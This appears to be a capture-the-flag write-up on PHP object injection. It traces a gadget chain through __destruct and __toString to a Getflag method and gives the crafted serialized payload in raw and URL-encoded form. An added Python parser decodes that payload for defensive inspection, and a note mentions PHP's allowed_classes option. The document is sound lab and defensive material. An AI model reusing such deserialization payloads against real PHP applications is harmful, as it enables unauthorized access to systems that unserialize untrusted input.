Analyzing the code, the flow to get the flag should be: unserialize -> w22m object -> __destruct() -> echo $this->w00m (a w33m object) -> __toString() -> $this->w00m->{$this->w22m}() -> w44m->Getflag()
Then the payload:
O:4:"w22m":1:{s:4:"w00m";O:4:"w33m":2:{s:4:"w00m";O:4:"w44m":2:{s:11:"\0w44m\0admin";s:4:"w44m";s:9:"\0*\0passwd";s:5:"08067";}s:4:"w22m";s:7:"Getflag";}}
URL-encoding it gives:
O%3A4%3A%22w22m%22%3A1%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w33m%22%3A2%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w44m%22%3A2%3A%7Bs%3A11%3A%22%00w44m%00admin%22%3Bs%3A4%3A%22w44m%22%3Bs%3A9%3A%22%00%2A%00passwd%22%3Bs%3A5%3A%2208067%22%3B%7Ds%3A4%3A%22w22m%22%3Bs%3A7%3A%22Getflag%22%3B%7D%7D
Finally, this yields the flag.
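As an added example (not part of the original write-up): a Python parser for PHP's serialize() format that URL-decodes the payload above and recovers the object graph, including the NUL-prefixed private and protected property names that make URL-encoding necessary. This is the view a defender needs when inspecting input headed for unserialize(); the names Obj, split_prop, read_str, parse and classes are invented for this example.

```python
from collections import namedtuple
from urllib.parse import unquote
# Added example (not from the write-up). PAYLOAD is the URL-encoded string given above.
PAYLOAD = (
    "O%3A4%3A%22w22m%22%3A1%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w33m%22%3A2%3A%7B"
    "s%3A4%3A%22w00m%22%3BO%3A4%3A%22w44m%22%3A2%3A%7Bs%3A11%3A%22%00w44m%00admin%22%3B"
    "s%3A4%3A%22w44m%22%3Bs%3A9%3A%22%00%2A%00passwd%22%3Bs%3A5%3A%2208067%22%3B%7D"
    "s%3A4%3A%22w22m%22%3Bs%3A7%3A%22Getflag%22%3B%7D%7D"
)
Obj = namedtuple("Obj", "cls props")  # one serialized object: class name + properties

def split_prop(name):
    r"""Undo PHP name mangling: \0*\0name is protected, \0Class\0name is private."""
    owner, _, prop = name[1:].partition("\0") if name[:1] == "\0" else ("", "", name)
    return prop, {"": "public", "*": "protected"}.get(owner, "private to " + owner)

def read_str(s, i):
    """Read <len>:"<data>" with i at the length digits; return (data, index after the quote)."""
    colon = s.index(":", i)
    end = colon + 2 + int(s[i:colon])
    if s[end:end + 1] != '"':
        raise ValueError(f"declared length does not match data at offset {i}")
    return s[colon + 2:end], end + 1

def parse(s, i=0):
    """Parse one serialize() value starting at s[i]; return (value, next index)."""
    tag = s[i]
    if tag in "Nib":                                  # N;  i:<int>;  b:<0|1>;
        end = s.index(";", i)
        return (None if tag == "N" else int(s[i + 2:end])), end + 1
    if tag == "s":                                    # s:<byte length>:"<data>";
        val, end = read_str(s, i + 2)
        return val, end + 1
    if tag not in "aO":                               # only arrays and objects remain
        raise ValueError(f"unsupported type tag {tag!r} at offset {i}")
    cls, i = read_str(s, i + 2) if tag == "O" else (None, i + 1)
    brace = s.index(":{", i)                          # a:<n>:{  or  O:<len>:"<class>":<n>:{
    count, i, items = int(s[i + 1:brace]), brace + 2, {}
    for _ in range(count):
        key, i = parse(s, i)
        items[key], i = parse(s, i)
    if s[i] != "}":
        raise ValueError(f"expected '}}' at offset {i}")
    return (Obj(cls, {split_prop(str(k)): v for k, v in items.items()}) if tag == "O" else items), i + 1

def classes(v):
    """Class names, outermost first, that unserialize() would be asked to instantiate."""
    kids = v.props.values() if isinstance(v, Obj) else v.values() if isinstance(v, dict) else []
    return ([v.cls] if isinstance(v, Obj) else []) + [c for k in kids for c in classes(k)]
```

Decode with unquote(PAYLOAD, encoding="latin-1") before calling parse() so that byte lengths and string indices line up. On the PHP side, passing ['allowed_classes' => false] as the second argument to unserialize() keeps the listed classes from being instantiated.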